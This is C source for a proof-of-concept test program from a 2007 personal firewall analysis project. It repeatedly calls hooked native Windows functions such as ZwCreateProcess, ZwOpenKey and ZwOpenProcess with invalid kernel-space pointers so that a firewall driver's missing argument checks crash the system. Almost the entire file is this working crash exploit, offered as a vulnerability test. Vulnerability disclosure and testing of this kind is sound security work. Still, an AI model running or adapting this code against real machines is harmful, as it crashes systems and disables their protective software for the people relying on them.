/*

 Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P006KA)
 

 Usage:
 prog FUNCNAME
   FUNCNAME - name of function to be checked

 Description:
 This program calls given function with parameters that crash the system. This happens because of 
 insufficient validation of function arguments in the driver of the firewall.

 Test:
 Running the testing program with the name of a function from the list of affected functions.

*/

#undef __STRICT_ANSI__
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <ddk/ntapi.h>
#include <ddk/ntifs.h>

typedef NTSTATUS NTAPI (*ZW_CREATE_PROCESS_EX)(OUT PHANDLE ProcessHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes,IN HANDLE InheritFromProcessHandle,IN BOOLEAN  InheritHandles,IN HANDLE SectionHandle OPTIONAL,IN HANDLE DebugPort OPTIONAL,IN HANDLE ExceptionPort OPTIONAL,IN ULONG Unknown);


void about(void)
{
  printf("Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P006KA)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2007 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test FUNCNAME\n"
         "  FUNCNAME - name of function to be checked\n");
  return;
}

int main(int argc,char **argv)
{
  about();

  if (argc!=2)
  {
    usage();
    return 1;
  }

  if (!stricmp(argv[1],"NtCreateKey") || !stricmp(argv[1],"ZwCreateKey"))
  {
    HANDLE handle;

    for (int i=0;i>=0;i++)
      ZwCreateKey(&handle,KEY_ALL_ACCESS,(PVOID)(0x80000000+i),0,NULL,0,NULL);

  } else if (!stricmp(argv[1],"NtCreateProcess") || !stricmp(argv[1],"ZwCreateProcess"))
  {
    OBJECT_ATTRIBUTES oa;
    for (int i=0;i>=0;i++)
      ZwCreateProcess((PHANDLE)(i+0x80000000),PROCESS_ALL_ACCESS,&oa,NULL,FALSE,NULL,NULL,NULL);
  } else if (!stricmp(argv[1],"NtCreateProcessEx") || !stricmp(argv[1],"ZwCreateProcessEx"))
  {
    ZW_CREATE_PROCESS_EX ZwCreateProcessEx=(ZW_CREATE_PROCESS_EX)GetProcAddress(GetModuleHandle("ntdll.dll"),"ZwCreateProcessEx");
    if (ZwCreateProcessEx)
    {
      OBJECT_ATTRIBUTES oa;
      for (int i=0;i>=0;i++)
        ZwCreateProcessEx((PHANDLE)(i+0x80000000),PROCESS_ALL_ACCESS,&oa,NULL,FALSE,NULL,NULL,NULL,0);
    }
  } else if (!stricmp(argv[1],"NtCreateSection") || !stricmp(argv[1],"ZwCreateSection"))
  {
    HANDLE handle;
    for (int i=0;i>=0;i++)
    {
      POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
      ZwCreateSection(&handle,0,oa,NULL,0,0,NULL);
    }
  } else if (!stricmp(argv[1],"NtCreateSymbolicLinkObject") || !stricmp(argv[1],"ZwCreateSymbolicLinkObject"))
  {
    HANDLE handle;
    OBJECT_ATTRIBUTES oa;
    for (int i=0;i>=0;i++)
    {
      UNICODE_STRING us={0x1000,0x1000,(PWSTR)(i+0x80000000)};
      InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
      ZwCreateSymbolicLinkObject(&handle,SYMBOLIC_LINK_ALL_ACCESS,&oa,&us);
    }
  } else if (!stricmp(argv[1],"NtCreateThread") || !stricmp(argv[1],"ZwCreateThread"))
  {
    HANDLE handle;
    CLIENT_ID clid;
    OBJECT_ATTRIBUTES oa;
    USER_STACK us;
    for (int i=0;i>=0;i++)
      ZwCreateThread(&handle,THREAD_ALL_ACCESS,&oa,(HANDLE)i,&clid,(PCONTEXT)(i+0x80000000),&us,FALSE);
  } else if (!stricmp(argv[1],"NtLoadKey2") || !stricmp(argv[1],"ZwLoadKey2"))
  {
    OBJECT_ATTRIBUTES oa2;
    
    for (int i=0;i>=0;i++)
    {
      POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
      ZwLoadKey2(oa,&oa2,REG_NO_LAZY_FLUSH);
    }
  } else if (!stricmp(argv[1],"NtOpenKey") || !stricmp(argv[1],"ZwOpenKey"))
  {
    HANDLE handle;
    for (int i=0;i>=0;i++)
    {
      POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
      ZwOpenKey(&handle,KEY_ALL_ACCESS,oa);
    }
  } else if (!stricmp(argv[1],"NtOpenProcess") || !stricmp(argv[1],"ZwOpenProcess"))
  {
    HANDLE handle;
    OBJECT_ATTRIBUTES oa;
    UNICODE_STRING us={0x1000,0x1000,NULL};
    InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
    for (int i=0;i>=0;i++)
    {
      PCLIENT_ID clid=(PVOID)(i+0x80000000);
      ZwOpenProcess(&handle,PROCESS_ALL_ACCESS,&oa,clid);
    }
  } else printf("\nI do not know how to exploit the vulnerability using this function.\n");

  printf("\nTEST FAILED!\n");
  return 1;
}
